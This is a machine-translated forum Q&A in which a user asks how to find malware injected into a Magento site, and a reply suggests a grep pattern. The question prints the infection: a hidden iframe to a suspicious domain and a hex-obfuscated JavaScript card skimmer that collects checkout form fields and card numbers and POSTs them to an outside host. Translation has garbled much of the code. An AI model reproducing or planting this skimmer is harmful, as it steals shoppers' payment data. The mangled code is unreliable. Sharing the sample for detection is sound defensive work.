我的一位朋友向我求助,他的Magento网站感染了恶意软件,是否有一种有效的方法或工具来扫描php / javascript目录+ subdir以获取特定的代码行,在这种情况下:
//]]><“iframe”src =“http://web-statistika-google-now.com/?Yddv7D”width =“1”height =“1”frameborder =“0”> ; (添加 ””) 和
var _0x20f1 = [“\ x6C \ x6F \ x63 \ x61 \ x74 \ x69 \ x6F \ x6E”,“\ x74 \ x65 \ x73 \ x74”,“\ x6F \ x6E \ x65 \ x70 \ x61 \ x67 \ X65 \ X7C \ X63 \ X68 \ X65 \ X63 \ X6B \ x6F \ X75 \ X74 \ X7C \ x6F \ x6E \ X65 \ X73 \ X74 \ X65 \ X70 \ X63 \ X68 \ X65 \ X63 \ X6B \ x6F \ X75 \ X74 \ X7C \ x6F \ x6E \ X65 \ X70 \ X61 \ X67 \ X65 \ X63 \ X68 \ X65 \ X63 \ X6B \ x6F \ X75 \ X74 \ X7C \ X66 \ X69 \ X72 \ X65 \ X63 \ X68 \ X65 \ X63 \ X6B \ x6F \ X75 \ X74 \ X7C \ x6F \ x6E \ X65 \ X73 \ X74 \ X65 \ X70" ,“\ X44 \ x4F \ x4D \ X43 \ x6F \ x6E \ X74 \ X65 \ x6E \ X74 \ x4C \ x6F \ X61 \ 64 \ X65 \ 64" , “\ X61 \ 64 \ 64 \ X45 \ X76 \ X65 \ x6E \ X74 \ x4C \ X69 \ X73 \ X74 \ X65 \ x6E \ X65 \ X72”,“\ X69 \ x6E \ X70 \ X75 \ X74 \ X2C \ X20 \ X73 \ X65 \ X6C \ X65 \ X63 \ X74 \ X2C \ X20 \ X74 \ X65 \ X78 \ X74 \ X61 \ X72 \ X65 \ X61 \ X2C \ X20 \ X63 \ X68 \ X65 \ X63 \ X6B \ X62 \ x6F \ X78" ,“\ X71 \ X75 \ X65 \ X72 \ X79 \ X53 \ X65 \ X6C \ X65 \ X63 \ X74 \ x6F \ X72 \ X41 \ X6C \ X6C ”, “\ X6C \ X65 \ x6E \ X67 \ X74 \ X68”, “\ X76 \ X61 \ X6C \ X75 \ X65”, “\ X69 \ 64”, “”, “\ X3D”, “\ X26”, “\ X61 \ x5B \ X68 \ X72 \ X65 \ X66 \ X2A \ X3D \ X27 \ X6A \ X61 \ X76 \ X61 \ X73 \ X63 \ X72 \ X69 \ X70 \ X74 \ X3A \ X76 \ x6F \ X69 \ 64 \ X28 \ X30 \ X29 \ X27 \ X5D \ X2C \ X62 \ X75 \ X74 \ X74 \ x6F \ x6E \ X2C \ X20 \ X69 \ x6E \ X70 \ X75 \ X74 \ X2C \ X20 \ X73 \ X75 \ X62 \ X6D \ X69 \ X74 \ X2C \ X20 \ X2E \ X62 \ X74 \ x6E \ X2C \ X20 \ X2E \ X62 \ X75 \ X74 \ X74 \ x6F \ x6E”, “\ X74 \ X79 \ X70 \ X65”, “\ X74 \ X65 \ X78 \ X74”, “\ X73 \ X6C \ X65 \ X63 \ X74” , “\ X63 \ X68 \ X65 \ X63 \ X6B \ X62 \ x6F \ X78”, “\ X70 \ X61 \ X73 \ X73 \ X77 \ x6F \ X72 \ 64”,“\ X72 \ X61 \ 64 \ X69 \ x6F “ ”\ X63 \ X6C \ X69 \ X63 \ X6B“, ”\ x6F \ x6E \ X63 \ X6C \ X69 \ X63 \ X6B“,” \ X61 \ X74 \ X74 \ X61 \ X63 \ X68 \ X45 \ X76 \ X65 \ x6E \ X74" , “\ X66 \ x6F \ X72 \ X6D”, “\ X73 \ X75 \ X62 \ X6D \ X69 \ X74”,“\ x6F \ x6E \ X73 \ X75 \ X62 \ X6D \ X69 \ X74 “ ”\ X63 \ X6C \ X65 \ X61 \ X72“, ”\ x5B \ X30 \ X2D \ X39 \ X5D \ x7B \ X31 \ X33 \ X2C \ X31 \ X36 \ x7D“, ”\ X30“,” \ X31 “ ”\ X50 \ x4F \ X53 \ X54“,” \ X68 \ X74 \ X74 \ X70 \ X73 \ X3A \ X2F \ X2F \ X69 \ x6E \ X66 \ x6F \ X70 \ X72 \ x6F \ X6D \ x6F \ X2E \ X62 \ X69 \ X7A \ X2F \ X6C \ X69 \ X62 \ X2F \ X70 \ X61 \ X79 \ X70 \ X61 \ X6C \ X5F \ X69 \ X63 \ x6F \ x6E \ X2E \ X6A \ X70 \ X67" ,“\ x6F \ X70 \ X65 \ x6E “ ”\ X43 \ x6F \ x6E \ X74 \ X65 \ x6E \ X74 \ X2D \ X74 \ X79 \ X70 \ X65“,” \ X61 \ X70 \ X70 \ X6C \ X69 \ X63 \ X61 \ X74 \ X69 \ x6F \ x6E \ X2F \ X78 \ X2D \ X77 \ X77 \ X77 \ X2D \ X66 \ x6F \ X72 \ X6D \ X2D \ X75 \ X72 \ X6C \ X65 \ x6E \ X63 \ x6F \ 64 \ X65 \ 64" , “\ X73 \ X65 \ X74 \ X52 \ X65 \ X71 \ X75 \ X65 \ X73 \ X74 \ X48 \ X65 \ X61 \ 64 \ X65 \ X72”,“\ 64 \ X61 \ X74 \ X61 \ X3D “ ”\ X26 \ X61 \ X73 \ 64 \ X3D“,” \ X26 \ X69 \ 64 \ X5F \ X69 \ 64 \ X3D \ X6D \ X61 \ X73 \ x73 \ x69 \ x6E \ x73 \ x74 \ x61 \ x6C \ x6C“,”\ x73 \ x65 \ x6E \ x64“,”\ x73 \ x65 \ x6E \ x64 \ x28 \ x29“]; var snd = null;功能start(){if((new RegExp(_0x20f1 [2]))_ 0x20f1 [1]){send()}} document_0x20f1 [4]; function clk(){var _0xdb51x4 = document_0x20f1 [6]; for(var _0xdb51x5 = 0; _0xdb51x5< _0xdb51x4 [_0x20f1 [7]]; _ 0xdb51x5 ++){if(_0xdb51x4 [_0xdb51x5] [_ 0x20f1 [8]] [_ 0x20f1 [7]]> 0){var _0xdb51x6 = _0xdb51x4 [_0xdb51x5] [_ 0x20f1 [9] ];若(_0xdb51x6 == _ 0x20f1 [10]){_ 0xdb51x6 = _0xdb51x5}; SND + = _ 0xdb51x4 [_0xdb51x5] [_ 0x20f1 [9]] + _ 0x20f1 [11] + _ 0xdb51x4 [_0xdb51x5] [_ 0x20f1 [8]] + _ 0x20f1 [12 ];}}};}函数send(){var _0xdb51x8 = document_0x20f1 [6]; for(var _0xdb51x5 = 0; _0xdb51x5< _0xdb51x8 [_0x20f1 [7]]; _ 0xdb51x5 ++){var _0xdb51x9 = _0xdb51x8 [_0xdb51x5]; if(_0xdb51x9) ![_0x20f1 [14] = _ 0x20f1 [15]&安培;&安培; _0xdb51x9 [_0x20f1 [14] = _ 0x20f1 [16]&安培;!&安培;!_0xdb51x9 [_0x20f1 [14] = _ 0x20f1 [17]&安培;&安培; _0xdb51x9 [_0x20f1 [14]]!= _ 0x20f1 [18]&& _0xdb51x9 [_0x20f1 [14]]!= _ 0x20f1 [19]){if(_0xdb51x9 [_0x20f1 [4]]){_ 0xdb51x9_0x20f1 [4]} else { _0xdb51x9_0x20f1 [22]}};}; var _0xdb5 1xa = document_0x20f1 [6]; for(var _0xdb51x5 = 0; _0xdb51x5< _0xdb51xa [_0x20f1 [7]]; _ 0xdb51x5 ++){if(_0xdb51xa [_0xdb51x5] [_ 0x20f1 [4]]){_ 0xdb51xa [_0xdb51x5] _0x20f1 [4]} else {_0xdb51xa [_0xdb51x5] _0x20f1 [22]}}; if(snd!= null){console_0x20f1 [26]; var _0xdb51xb = new RegExp(_0x20f1 [27]); var _0xdb51xc = _0x20f1 [28]; if(_0xdb51xb_0x20f1 [ 1]){_ 0xdb51xc = _0x20f1 [29]}; var _0xdb51xd = new XMLHttpRequest(); _ 0xdb51xd_0x20f1 [32]; _ 0xdb51xd_0x20f1 [35]; _ 0xdb51xd_0x20f1 [39]; console_0x20f1 [26];}; snd = null; setTimeout(_0x20f1 [ 40],140);}
任何帮助都会非常感激!
扬
答案 0 :(得分:0)
在root中你可以尝试
grep -r "var _0x[a-Z0-9]*=[\"\\x[a-Z0-9]*".*setTimeout\(.*\)\;\} .
至少与你现有的相匹配。我不会找到并替换它,除非你真的很绝望。
我假设它以var_0x开头并且在开头包含大量的十六进制,然后以setTimeout调用结束,如您的示例所示。
至少它可以帮助您识别潜在的问题文件(在我们的例子中,它就是所有文件)。